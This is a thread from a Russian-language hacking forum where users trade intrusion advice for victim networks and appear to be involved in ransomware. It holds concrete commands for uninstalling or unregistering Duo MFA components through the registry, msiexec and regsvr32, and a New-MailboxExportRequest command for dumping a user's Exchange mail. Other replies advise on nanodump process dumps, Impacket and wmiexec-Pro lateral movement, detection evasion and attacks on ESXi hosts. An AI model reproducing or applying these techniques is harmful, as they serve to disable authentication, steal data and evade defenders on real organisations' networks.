• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

Здравствуйте,подскажите пожалуйста как обойти DUO mfa rdp
по смб подрубись, если есть админ. и просто удали дуо.
REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /v UninstallString
msiexec.exe /x {тут UninstallString}

либо рубани временно
regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll"
regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredFilter.dll"

1)как разблокировать и скопировать файл защищенный процессом не убивая сам процесс?
2)как забрать с сервера единичный файл весом терабайт?

1)как разблокировать и скопировать файл защищенный процессом не убивая сам процесс?
2)как забрать с сервера единичный файл весом терабайт?
1. дамп процесса делать через клонирование, типа того же нанодампа если бинарь не будет блокирован ав. у нанодампа есть куча вариантов/видов дампа.
2. ну только в облако закидывать.

1. дамп процесса делать через клонирование, типа того же нанодампа если бинарь не будет блокирован ав. у нанодампа есть куча вариантов/видов дампа.
2. ну только в облако закидывать.
Шадоукопи вроде надо чтобы был включен изначально, или ошибаюсь?!

Шадоукопи вроде надо чтобы был включен изначально, или ошибаюсь?!
пофигу. через форк (или снапшот) норм работает.

какие экзеки лучше использовать?
Встроенные?Никакие насколько я помню, нужно переписывать
Благо там простые детекты и триал легко получить

Последнее редактирование:
Насколько сильно дефендер АТП палит цме и импакет? какие экзеки лучше использовать?
Всмысле палит дефенедер, смотря что ты им делаешь. Я лично проверял (RDP) что в основном палятся попытки юзать ПС, снимал дампы, нтдс и т.д. и не примпомню, чтобы деф ругался, сомневаюсь что на ATP (win 11?) что-то сильно изменилось, тем более что ты используешь виндовые методики работы, если речь про смб управление

Всмысле палит дефенедер, смотря что ты им делаешь. Я лично проверял (RDP) что в основном палятся попытки юзать ПС, снимал дампы, нтдс и т.д. и не примпомню, чтобы деф ругался, сомневаюсь что на ATP (win 11?) что-то сильно изменилось, тем более что ты используешь виндовые методики работы, если речь про смб управление
я про что-то типа этого говорил https://redcanary.com/threat-detection-report/threats/impacket/ . Там на некоторые экзеки сразу летят дететкты

я про что-то типа этого говорил https://redcanary.com/threat-detection-report/threats/impacket/ . Там на некоторые экзеки сразу летят дететкты
Не могу сказать конкретно по импакету, я крайне редко им пользуюсь, сме в основном и еще есть https://github.com/XiaoliChan/wmiexec-Pro для "тяжелых" случаев)) хотя оба используют импакетовскую основу, но проблем нет

Подскажите пожалуйста,очень срочно какую инфу тянуть в Exchange server и тянут ли вообще ?
Сделать дамп почты

New-MailboxExportRequest -Mailbox scox -ContentFilter "(Received -lt '10.12.2023') -and (Received -gt '01.01.2020')" -FilePath "10.10.5.5c$programdatascox.pst"

Пожалуйста, обратите внимание, что пользователь заблокирован
подскажите еще нюанс с таким не сталкивался
через vsphere есик не могу ввести в домен,пишет errors in active directory operations

В локалке Форти иногда попадаются VMware ESXi 6.7.0 например. Домена и других хостов нет
Креды не подходят.
CVE-2021-21972, CVE-2021-22005 и CVE-2017-0143 не срабатыввают. Какие еще есть способы получить доступ?

1) Можно ли, как либо, узнать о том что компания делала выплату или нет? работая на пример с кем либо, по мимо того что спросить у партнера и зная что за компания, доступ к впн и т.д.
2) как быстро пробить сеть на диапазоны, название сети к которой впн привязан и подобная быстрая вводная информация не через zoomeye
3) какие сканы сети есть помимо мячика

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх